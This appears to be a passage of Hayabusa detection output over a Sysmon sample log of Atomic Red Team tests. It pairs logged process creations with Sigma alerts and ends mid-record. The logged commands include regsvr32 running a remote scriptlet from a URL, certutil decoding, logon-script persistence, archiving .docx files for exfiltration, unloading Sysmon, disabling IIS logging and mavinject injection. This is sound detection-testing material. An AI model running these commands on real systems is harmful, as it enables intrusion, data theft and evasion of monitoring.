Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : 